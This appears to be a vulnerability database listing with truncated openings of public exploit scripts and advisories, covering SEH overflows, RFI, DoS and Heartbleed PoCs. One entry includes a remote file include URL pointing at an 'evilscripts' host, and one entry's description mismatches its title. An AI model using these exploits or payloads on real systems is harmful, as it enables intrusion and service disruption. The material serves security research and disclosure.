Mediacoder 0.7.3.4672 - SEH Exploit

No description provided by source. !/usr/bin/python from sys import argv Title: Mediacoder v0.7.3.4672 SEH Exploit Author: Stoke from devilc0de crew http://hack2web.altervista.org http://devilc0de.altervista.org Tested on: Windows XP SP2 ita shell =...

BigAnt Server 2.52 - Remote Buffer Overflow Exploit (2)

No description provided by source. !/usr/bin/python BigAnt Server 2.52 remote buffer overflow exploit 2 Author: DouBleZer0 Vulnerability discovered by Lincoln a another version of the original exploit by Lincoln application is little hazy.. import sys,socket host = sys.argv1 buffer= \x90 20...

OneOrZero Helpdesk 1.4 Install.PHP Administrative Access Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/7611/info OneOrZero Helpdesk has been reported prone to an issue that may result in an attacker obtaining unauthorized administrative access. The issue presents itself due to a programming error in a Helpdesk script...

RedBlog 0.5 Index.PHP Remote File Include Vulnerability

RedBlog 0.5 Index.PHP 远程文件包含漏洞 漏洞类型： 输入验证错误 漏洞危害： 攻击者可以利用该漏洞执行远程php文件，从而攻击RedBlog甚至控制 服务器 exp： http://www.example.com/Path/index.php?rootpath==http://evilscripts? 解决方案： 厂商没有提供补丁，推荐使用加速乐: !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from...

Thunder Kankan Player 4.8.3.840 - Stack Overflow/DOS Exploit

No description provided by source. !/usr/bin/env python print 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /\ /\ \ /\ /\ /\ \ /\ 0 0 /:/ / /::\ \ /:/ / /:/ / /::\ \ /:/ / 1 1 /:// /:/:\ \ /:/ / /:/ / /:/:\ \ /:// 0 0 /::\ \ /::\:\ \ /:/ / /:/ / /:/ :...

Insky CMS 006-0111 - Multiple Remote File Include Vulnerability

No description provided by source. !/usr/bin/env python coding: utf-8 import re from pocsuite.net import req from pocsuite.poc import Output, POCBase from pocsuite.utils import register class InskyCMSRemoteFileIncludePOCBase: vulID = '68005' version = '1' vulDate = '2006-06-25' author = ' '...

Download Accelerator plus (DAP) 9.7 - M3U File Buffer Overflow Exploit (Unicode SEH)

No description provided by source. !/usr/bin/python +Exploit Title: Download Accelarator plusDAP 9.7 M3U File Buffer Overflow ExploitUNICODE-SEH +Date: 23\07\2011 +Author: C4SS!0 G0M3S +Software Link: http://download.speedbit.com/dap97baix.exe +Version: 9.7 +Tested On: WIN-XP SP3 Brazilian...

Ekiga 2.0.5 - (GetHostAddress) Remote Denial of Service Exploit

No description provided by source. !/usr/bin/env python Ekiga GetHostAddress Remote Denial of Service Vulnerability CVE-2007-4897 ekiga207dos.py by Jose Miguel Esparza 2007-09-11 S21sec labs import sys,socket if lensys.argv != 3: sys.exitUsage: + sys.argv0 + targethost targetport\n target =...

Microsoft Active Directory LDAP Server Username Enumeration Weakness

No description provided by source. source: http://www.securityfocus.com/bid/32305/info Microsoft Active Directory is prone to a username-enumeration weakness because of a design error in the application when verifying user-supplied input. Attackers may exploit this weakness to discern valid...

Power/Personal FTP Server RETR Denial of Service

No description provided by source. !/usr/bin/python -------------------------------------------- Power/Personal FTP Server RETR Command DoS -------------------------------------------- Title: Power/Personat FTP Server RETR Command DoS Author: antrhacks Software Link:...

McNews 1.x Install.PHP Arbitrary File Include Vulnerability

No description provided by source. !/usr/bin/env python coding: utf-8 import re from pocsuite.net import req from pocsuite.poc import Output, POCBase from pocsuite.utils import register class McNewsRemoteFileIncludePOCBase: vulID = '78899' version = '1' vulDate = '2005-03-17' author = ' '...

Quick Player 1.3 Unicode SEH Exploit

No description provided by source. Quick Player 1.3 Unicode SEH Exploit Author Abhishek Lyall and Puneet Jain [email protected] , abhilyallatgmaildotcom, infoataslitsecuritydotcom Web - http://www.aslitsecurity.com/ Blog - http://www.aslitsecurity.blogspot.com/ Download Vulnerable...

NIBE heat pump LFI exploit

No description provided by source. !/usr/bin/python import socket,sys,os,base64 NIBE heat pump LFI exploit Written by Jelmer de Hen Published at http://h.ackack.net/?p=302 Special thanks to Fredrik Nordberg Almroth and Mathias Karlsson for obtaining this information http://h.ackack.net/?p=274 whi...

Microsoft Internet Explorer 7.0 HTML Denial of Service Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/23178/info Microsoft Internet Explorer is prone to a denial-of-service vulnerability because the application fails to handle exceptional conditions. This issue is triggered when an attacker entices a victim user to visit ...

Core FTP Server Version 1.2, build 535, 32-bit - Crash Poc

D-Link DIR-652, DIR-835, DIR-855L, DGL-500, and DHP-1565 suffer from clear text storage of passwords, cross site scripting, and sensitive information disclosure vulnerabilities. !/usr/bin/python import socket,sys,time def Usage: print "Core FTP Server Version 1.2, build 535, 32-bit - Crash P.O.C....

enip-info NSE Script

This NSE script is used to send a EtherNet/IP packet to a remote device that has TCP 44818 open. The script will send a Request Identity Packet and once a response is received, it validates that it was a proper response to the command that was sent, and then will parse out the data. Information...

Than imagined more terror! OpenSSL“effort”vulnerability in-depth analysis-vulnerability warning-the black bar safety net

Author: yaoxi original source http://blog.wangzhan.360.cn/ Recently, OpenSSL broke this year's most serious security vulnerability in the hacker community is named“heart bleed”vulnerability. 3 6 0 site Guard security team of the vulnerability analysis, the vulnerability is not only related to htt...

Exploit for Out-of-bounds Read in Openssl

HeartBleed Tester & Exploit --------------------------- NB Ne...

TLS Heartbeat Proof Of Concept

!/usr/bin/env python Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford [email protected] The author disclaims copyright to this source code. Modified by Csaba Fitzl for multiple SSL / TLS version support import sys import struct import socket import time import select import ...

Heartbleed Proof Of Concept

!/usr/bin/python Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford [email protected] The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options =...